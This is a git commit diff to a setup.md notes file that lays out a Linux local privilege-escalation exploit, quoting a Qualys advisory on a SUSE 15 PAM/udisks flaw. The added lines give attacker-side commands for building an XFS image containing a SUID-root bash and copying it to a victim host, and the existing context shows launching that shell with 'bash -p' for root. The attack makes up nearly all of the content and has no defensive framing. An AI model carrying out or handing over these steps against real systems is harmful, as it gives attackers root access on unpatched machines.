Update setup.md

2025-10-07 09:49:54 +00:00
parent 873ad5843f
commit e0a4602f6d
1 changed files with 25 additions and 0 deletions
--- a/setup.md
+++ b/setup.md
@@ -25,4 +25,29 @@ find /tmp | grep blockdev
 mount

 /tmp/blockdev*/bash -p
+```
+
+
+From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
+
+```bash
+1/ On our own attacker machine, as root, we create an XFS image that
+contains a SUID-root shell, and copy it to the victim machine:
+
+------------------------------------------------------------------------
+attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300
+
+attacker# mkfs.xfs ./xfs.image
+
+attacker# mkdir ./xfs.mount
+
+attacker# mount -t xfs ./xfs.image ./xfs.mount
+
+attacker# cp /bin/bash ./xfs.mount
+
+attacker# chmod 04555 ./xfs.mount/bash
+
+attacker# umount ./xfs.mount
+
+attacker# scp -i id_ed25519 ./xfs.image nobody@victim:
 ```